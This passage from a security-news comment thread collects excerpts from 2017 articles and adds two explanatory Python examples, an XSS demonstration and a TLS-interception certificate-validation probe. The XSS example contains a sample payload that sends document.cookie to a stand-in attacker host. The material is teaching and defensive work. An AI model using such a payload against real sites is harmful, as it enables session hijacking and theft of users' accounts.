    Determining if the defect has a security component will take more digging. If I can demonstrate that exploiting this issue in some way to gain unauthorized access to data or the network, then this would also fall under the category of security. It is entirely possible that the defect may simply be a logic issue and, while potentially annoying, does not create an exploitable vulnerability.

    Based on my scenario above, we can then draw the conclusion that security is a subset of quality.

    Or maybe not.

    Clarifying the misunderstandings between quality and security

    A simple coding bug such as cross-site scripting (XSS) may counter our argument. The developer can code the software within adherence to the requirements and still make the code vulnerable to an XSS attack. The associated defect would be security related, but does reflect a defect from a quality point of view. Many would argue that a security vulnerability is a quality problem. I could easily get behind that line of reasoning, but others would invoke the stricter interpretation. This disabuses the notion that security is a subset of quality.

    Part of the misunderstanding between quality and security was that the two were functionally separated in traditional development shops, and the groups that owned them rarely interacted.

    Combining quality and security to enable the developer

    As development practices have evolved and agile methods continue to take root, the traditional quality and security silos have had to come down by necessity. Security is being integrated into the development process with the notion of enabling developers to build good security practices into their code. Similarly, the responsibility for quality is now shared by the developers. There is also higher awareness of the architecture, design, and requirements process and how that process affects quality and security.

    Broadening the quality and security perspective

    In the end, quality and security are critical components to a broader notion: software integrity.

    Ultimately, developers strive to develop the best software possible. This implies that defects—quality and security—should be minimalized, or, at best, eliminated. If we agree that quality and security problems are both a form of defect, then we must sufficiently address both to produce software of the highest integrity.

    Reply
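The XSS case above is the whole argument in miniature: code that satisfies its functional requirement ("echo the search term back to the user") and is still exploitable. The following is an added example written for this page, not code from the quoted article or from any real project; the page template, the function names and the sample payload are hypothetical. It puts the requirement-conforming but vulnerable renderer beside the hardened one and adds the kind of check a QA engineer can run alongside the functional test.

```python
"""Added example (not from the article): requirement-conforming yet
XSS-vulnerable rendering beside its hardened form, with a crude QA oracle.
"""
import html
import re

# Hypothetical page fragment; the requirement is only that the search term
# the user typed appears in the response.
PAGE = "<p>You searched for: {term}</p>"


def render_unsafe(term: str) -> str:
    """Meets the requirement verbatim; attacker-controlled markup becomes
    part of the DOM, so this is the XSS defect."""
    return PAGE.format(term=term)


def render_safe(term: str) -> str:
    """Same requirement, same output for benign input; html.escape turns
    <, >, &, and quotes into entities so the term is inert text in an
    HTML text-node context."""
    return PAGE.format(term=html.escape(term, quote=True))


# QA oracle: does the rendered HTML still contain a live <script> tag?
_SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def contains_active_script(fragment: str) -> bool:
    return bool(_SCRIPT_TAG.search(fragment))


# Constructed inputs: one functional test case, one attack case.
BENIGN = "raspberry pi"
PAYLOAD = (
    '<script>document.location="https://evil.example/?c="'
    "+document.cookie</script>"
)


def quality_check(render) -> bool:
    """Functional acceptance: the typed term is visible in the page."""
    return BENIGN in render(BENIGN)


def security_check(render) -> bool:
    """Security acceptance: the attack payload does not yield live script."""
    return not contains_active_script(render(PAYLOAD))


if __name__ == "__main__":
    for name, fn in (("render_unsafe", render_unsafe), ("render_safe", render_safe)):
        print(f"{name}: quality={quality_check(fn)} security={security_check(fn)}")
```

Both renderers pass the functional check, which is exactly why a quality process built only from requirements misses the defect. The escaping shown is correct only for an HTML text-node context; a term placed into an attribute, a URL, or inline JavaScript needs the encoding appropriate to that context.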
  33. Tomi Engdahl says:

    US-CERT’s Warning on SSL Interception vs. Security is a False Dichotomy
    http://www.securityweek.com/us-certs-warning-ssl-interception-vs-security-false-dichotomy

    Other times, the nuance of a complicated issue gets lost in a headline that’s meant to scare—especially in infosec journalism. I’m thinking specifically of the coverage around the US CERT warning TA17-075A “HTTPS Interception Weakens TLS Security.” Reading a headline like “US Gov Backs Google’s Alarm: Warns Against HTTPS Interception Products,” you’d think that SSL interception is working against security, right? The CSO article reports on what Google says about what CERT says about a paper published on the quality of SSL interceptors called “The Security Impact of HTTPS Interception.”

    If you barely followed that last sentence, let me boil away the tallow for you.

    At issue is the use of transparent SSL/TLS interception devices that spoof the endpoint of the server in order to sit as a man in the middle between a client (typically a browser) and an HTTPS web server. These interception devices are installed in enterprise and government agency data centers to allow the local security team to inspect what’s going into and out of the network. The paper, and the CERT warning, point out that many of these SSL interception devices do SSL poorly. But that doesn’t mean the only choice is not to use them or that they’re not needed.

    The essence of this false dichotomy is that it completely ignores the question of why the interception is happening in the first place: security inspection.

    Certificate Verification Fallacies

    Classic SSL interceptors are notoriously lackadaisical about certificate verification. Historically, this comes from the fact that everyone used to be lackadaisical about certificates and certificate chains. And if an executive couldn’t get to his or her March Madness bracket because of a certificate chain error, which may or may not have been an error at the server, the SSL interceptor was the first thing to blame. So SSL interceptor vendors never really had a requirement to be too strict because their job was to provide visibility, not privacy, to the IT administrators.

    The “Security Impact of HTTPS Interception” paper quantified all these fallacies.

    Inconvenient Truth: SSL Interception Is Still a Kludge

    According to the “Security Impact…” paper, SSL interceptor vendors’ attempts to get a TLS extension that would provide a safer, sanctioned means of interception “have been met with great hostility within the standards groups.”

    To be charitable, one could say that the IETF TLS standards group is not in favor of such an extension because any official back door could quickly become an unofficial back door and besides, “We’re trying to build a more secure internet!” But in reality, the current IETF group, bless their hearts, come from academia or organizations like Google, Cloudflare, and Akamai, who have an interest in securing their own stuff and aren’t in the business of securing other people’s. Some of them have little idea what a modern enterprise security architecture looks like.

    What’s the Fix?

    Consensus for the value of interception looks further away than ever with Google, Cloudflare, and Akamai driving the standards committee for TLS 1.3. In the meantime, is there anything a security architect can do today?

    The conclusion of the CERT warning says “Organizations using an HTTPS inspection product should verify that their product properly validates certificate chains and passes any warnings or errors to the client.”

    The badssl.com website listed in the paper and the CERT warning is actually a pretty nifty tool to see at a glance how well your interceptor is doing at forwarding your TLS. It makes the bad transparent TLS proxy a lot less transparent.

    Reply
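The CERT recommendation quoted above ("verify that their product properly validates certificate chains and passes any warnings or errors to the client") can be turned into a repeatable test using the badssl.com hosts the warning points at. The script below is an added example written for this page, not part of the article, the paper or US-CERT's guidance. It assumes the published badssl.com test subdomains (expired, wrong-host, self-signed, untrusted-root) and that the machine running it sits behind the interceptor being tested; when run as a script it opens real TLS connections, while the verdict logic is a pure function that can be exercised offline with a substitute connector.

```python
"""Added example (not from the article): probe whether a TLS-intercepting
proxy forwards certificate errors to the client or silently swallows them.
"""
import socket
import ssl
from dataclasses import dataclass

# badssl.com test hosts (assumed from the public test set). The boolean is
# what a properly validating client must observe: handshake failure (True)
# or success (False).
PROBES = {
    "expired.badssl.com": True,        # expired leaf certificate
    "wrong.host.badssl.com": True,     # hostname does not match
    "self-signed.badssl.com": True,    # no chain to any trusted root
    "untrusted-root.badssl.com": True, # chain ends at an unknown CA
    "badssl.com": False,               # valid certificate, must succeed
}


@dataclass
class Result:
    host: str
    should_fail: bool
    handshake_ok: bool
    error: str = ""


def connect(host, port=443, timeout=5.0):
    """Attempt a TLS handshake with default (strict) verification.
    Returns (True, '') on success or (False, reason) on failure."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED + hostname check
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host):
                return True, ""
    except ssl.SSLCertVerificationError as e:
        return False, f"verify: {e.verify_message}"
    except (ssl.SSLError, OSError) as e:
        return False, f"{type(e).__name__}: {e}"


def verdict(result: Result) -> str:
    """'ok' when the outcome matches what a validating client must see;
    'interceptor-hides-error' when a broken certificate was accepted,
    which means the proxy re-signed it with its own trusted CA;
    'blocked' when the known-good host could not be reached."""
    if result.should_fail and result.handshake_ok:
        return "interceptor-hides-error"
    if not result.should_fail and not result.handshake_ok:
        return "blocked"
    return "ok"


def run_probes(connector=connect):
    """Run every probe through `connector` (injectable for offline tests)."""
    results = []
    for host, should_fail in PROBES.items():
        ok, err = connector(host)
        results.append(Result(host, should_fail, ok, err))
    return results


def summarize(results):
    """Return ({host: verdict}, overall_pass)."""
    verdicts = {r.host: verdict(r) for r in results}
    return verdicts, all(v == "ok" for v in verdicts.values())


if __name__ == "__main__":
    verdicts, passed = summarize(run_probes())
    for host, v in verdicts.items():
        print(f"{host:28s} {v}")
    print("PASS" if passed else "FAIL: proxy is masking certificate errors")
```

A "interceptor-hides-error" verdict on any of the broken hosts means the proxy accepted a certificate the browser would have rejected and then presented the client a fresh one signed by the enterprise CA, which is the exact failure the paper and the warning describe. A "blocked" verdict on the good host only tells you the probe could not reach it and says nothing about validation.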
  34. Tomi Engdahl says:

    Security co-operation unlikely to change post Brexit, despite threats
    ‘Messy divorce’ would help no one
    https://www.theregister.co.uk/2017/03/30/security_co_operation_post_brexit_europe/

    UK Prime Minister Theresa May is warning that failure to negotiate an agreement on Britain’s exit from the European Union could damage security cooperation. The tough line – contained in Wednesday’s historic letter triggering Article 50 – has re-focused minds on the possible security implications of Brexit.

    “In security terms a failure to reach agreement would mean our cooperation in the fight against crime and terrorism would be weakened,” the prime minister warned.

    The UK’s main national security and intelligence sharing partners are fellow members of NATO and members of the Five Eyes alliance (US, Canada, Australia, NZ), respectively. Neither of those arrangements is going to be affected by Brexit. In addition, France and Britain co-operate on defence outside the EU under the Lancaster House Treaty.

    How co-operation on cybercrime across Europe might work post Brexit is less settled. Europol, the pan-EU policing agency headquartered in The Hague, is an EU institution. That means the UK won’t be on the board at Europol post-Brexit, for one thing. Some affiliate status with Europol is possible however the risk exists that the UK will be “cut off” from the “full intelligence picture” after Brexit.

    Reply
  35. Tomi Engdahl says:

    The source code for a new banking Trojan dubbed Nuclear Bot was leaked online; experts speculate a rapid diffusion of the threat in the wild.
    http://securityaffairs.co/wordpress/57541/malware/nuclear-bot-source-code.html

    Reply
  36. Tomi Engdahl says:

    Internet Noise cycles through random websites to protest snooping ISPs
    http://www.theverge.com/2017/3/30/15127360/internet-noise-browsing-tool-advertising-isp

    This week, Congress voted to allow internet service providers to sell users’ web browsing histories, rolling back FCC rules passed under the Obama administration. Activists have already roundly criticized the vote as a win for a telecom industry eager to help sell targeted ads.

    Built by technologist Dan Schultz, a tool called Internet Noise will send random searches through a browser window, introducing some chaos to the tracking and ad-profiling process.

    As Schultz notes on the website for the tool, Internet Noise is a form of protest (and even a fun spin through weirder corners of the web), but it is emphatically not a way to shield your personal privacy on the internet. The website won’t be too disruptive to an advertising profile, especially if you’re still spending the majority of your time with your usual browsing habits.

    If you’re interested in a more effective approach, consider a VPN.

    Internet Noise
    https://slifty.github.io/internet_noise/index.html

    Click this button, and your browser will start passively loading random sites in browser tabs. Leave it running to fill their databases with noise. Just quit your browser when you’re done.

    Reply
  37. Tomi Engdahl says:

    Pornhub And YouPorn Are Adding Support for HTTPS Encryption
    https://motherboard.vice.com/en_us/article/pornhub-youporn-privacy-https-encryption

    Porn sites need to have good security. Hackers have repeatedly targeted such sites and made off with user data, including usernames and passwords.

    But, although it’s not a totally mutually exclusive concept, porn sites should consider the privacy of their users too. On Thursday, both Pornhub and YouPorn announced they were switching on HTTPS on their websites, which protects data in transit between users’ browsers and the sites’ servers.

    “With this Internet communication protocol we can ensure not only the security of our platform, but also that of our users,”

    HTTPS provides several different benefits: it can protect data entered into a web page, such as passwords, meaning that if a hacker is sitting on the same network as you, they’ll be unable to read any intercepted sensitive info. HTTPS may also help users be a bit more sure they are visiting the genuine Pornhub or YouPorn instead of an imposter site, perhaps designed to deliver malware or steal login credentials.

    “As one of the most viewed websites in the world, it is our duty to ensure the confidentiality and safety of our users,”

    Reply
  38. Tomi Engdahl says:

    Learn about the new Google sign-in page
    In the next few weeks, the page to sign in to your Google Account will look a little different.
    https://support.google.com/accounts/answer/7338427?visit_id=0-636264690998853656-1477068202&p=signin_newlook&rd=1

    Reply
  39. Tomi Engdahl says:

    Russia ‘actively involved’ in French election, warns US Senate intelligence chief
    http://m.france24.com/en/20170330-russia-actively-involved-french-election-warns-us-senate-intelligence-chief
    The head of the powerful Senate Intelligence Committee warned Wednesday that Russia is interfering in the French election just as it did in the US presidential campaign last year.

    Reply
  40. Tomi Engdahl says:

    How To Set Up A VPN After Congress Voted To Sell Your Online Data
    http://www.iflscience.com/technology/how-to-set-up-a-vpn-after-congress-voted-to-sell-your-online-data/

    Earlier this week, Congress voted to repeal Internet privacy restrictions. Once Trump signs it, which he is expected to do, it will strip away the online privacy rights of American citizens, allowing companies to buy your data.

    Understandably, this has led people to start considering setting up Virtual Private Networks (VPNs). If you value your privacy, you may want to do the same.

    Reply
  41. Tomi Engdahl says:

    Asha McLean / ZDNet:
    IBM X-Force report: Over 4B personal records leaked online in 2016, up 566% YoY; hackers increasingly targeting unstructured data such as email archives, IP

    Leaked records up 566 percent to 4 billion in 2016: IBM Security
    http://www.zdnet.com/article/leaked-records-up-566-percent-to-4-billion-in-2016-ibm-security/

    A report from Big Blue’s security arm has found that the number of records compromised grew by 566 percent in 2016 to more than 4 billion.

    Reply
  42. Tomi Engdahl says:

    Researcher Says 9 in 10 Smart TVs Vulnerable to Broadcast-based Attacks
    https://securityledger.com/2017/03/researcher-says-9-in-10-smart-tvs-vulnerable-to-broadcast-based-attacks/

    In-brief: a security researcher demonstrated a broadcast-based attack on smart televisions, almost three years after a similar demonstration by researchers at Columbia. More than 90 percent of smart TVs may be vulnerable – but carrying out an attack may be challenging.

    Reply
  43. Tomi Engdahl says:

    IoT Security News — Detection Improves, But Gaps Remain
    https://www.securerf.com/iot-security-news-detection-improves-gaps-remain/?utm_campaign=Email%20Newsletter&utm_source=hs_email&utm_medium=email&utm_content=49711299&_hsenc=p2ANqtz-_W9BxmMIbKvZwO7opdEegua07PIKwphTjcMUDdRXX1nN802MxA2pq5OCnd7ssoLfx_GPv2Fm4LlodLxN_SO_skzv7kr1fF0R8N1CERdtxuV2BnADQ&_hsmi=49739146

    While IoT security hacks and ransomware attacks have been on the rise, the ability to detect attacks and take remedial action has improved. As evidenced by the IoT-security news items below, IT security staff can spot some types of attacks during or immediately after they occur – but in some cases, even the most stringent precautions are no match for determined hackers.

    Toy Hack via IoT Is No Child’s Play
    Surveillance Cameras Hacked Days Before Presidential Inauguration
    University’s IoT Devices Used Against Its Network

    To prevent these and other types of attacks from occurring, IoT devices must be secured with strong authentication and data protection solutions.

    Reply
  44. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    Remote exploit, successfully demoed on two fully-updated Samsung smart TV models in Feb., compromises TVs via maliciously-crafted digital video broadcast signal — Demo exploit is inexpensive, remote, scalable—and opens door to more advanced hacks. — A new attack that uses terrestrial radio signals …

    Smart TV hack embeds attack code into broadcast signal—no access required
    Demo exploit is inexpensive, remote, scalable—and opens door to more advanced hacks.
    https://arstechnica.com/security/2017/03/smart-tv-hack-embeds-attack-code-into-broadcast-signal-no-access-required/

    A new attack that uses terrestrial radio signals to hack a wide range of Smart TVs raises an unsettling prospect—the ability of hackers to take complete control of a large number of sets at once without having physical access to any of them.

    The proof-of-concept exploit uses a low-cost transmitter to embed malicious commands into a rogue TV signal. That signal is then broadcast to nearby devices. It worked against two fully updated TV models made by Samsung. By exploiting two known security flaws in the Web browsers running in the background, the attack was able to gain highly privileged root access to the TVs. By revising the attack to target similar browser bugs found in other sets, the technique would likely work on a much wider range of TVs.

    “Once a hacker has control over the TV of an end user, he can harm the user in a variety of ways,” Rafael Scheel, the security consultant who publicly demonstrated the attack, told Ars. “Among many others, the TV could be used to attack further devices in the home network or to spy on the user with the TV’s camera and microphone.”

    Reply
  45. Tomi Engdahl says:

    Hackers Are Emptying ATMs With a Single Drilled Hole and $15 Worth of Gear
    https://www.wired.com/2017/04/hackers-emptying-atms-drill-15-worth-gear/

    Researchers from the Russian security firm Kaspersky on Monday detailed a new ATM-emptying attack, one that mixes digital savvy with a very precise form of physical penetration. Kaspersky’s team has even reverse engineered and demonstrated the attack, using only a portable power drill and a $15 homemade gadget that injects malicious commands to trigger the machine’s cash dispenser.

    Reply
  46. Tomi Engdahl says:

    Android Ransomware Employs Advanced Evasion Techniques
    http://www.securityweek.com/android-ransomware-employs-advanced-evasion-techniques

    A newly discovered Android ransomware family employs heavy obfuscation and delayed activation of malicious functionality to ensure it can evade anti-virus solutions, Zscaler security researchers warn.

    The malware was found hidden inside the repackaged Russian entertainment social network app OK, which the malware author disassembled to insert malicious code, researchers say. The good news, however, is that the legitimate variant of OK, which has over 50 million downloads in Google Play, hasn’t been compromised.

    The first evasion technique leveraged by the mobile threat involves kicking off the malicious activity four hours after the initial installation. Most detection mechanisms expect malware to immediately start operation, meaning that this ransomware won’t be immediately detected.

    After the four hours have passed, however, users are prompted to activate device administrator rights for the application. Users can’t dismiss the activation screen and clicking the “Cancel” button won’t help either, because the screen is immediately re-displayed until admin rights are enabled, the security researchers reveal.

    Reply
  47. Tomi Engdahl says:

    Fake Flash Player Ads in Skype Lead to Malware
    http://www.securityweek.com/fake-flash-player-ads-skype-lead-malware

    Skype users appear to have been targeted in a recent malvertising campaign that was aggressively pushing malware hidden behind a fake Flash Player package.

    Reply
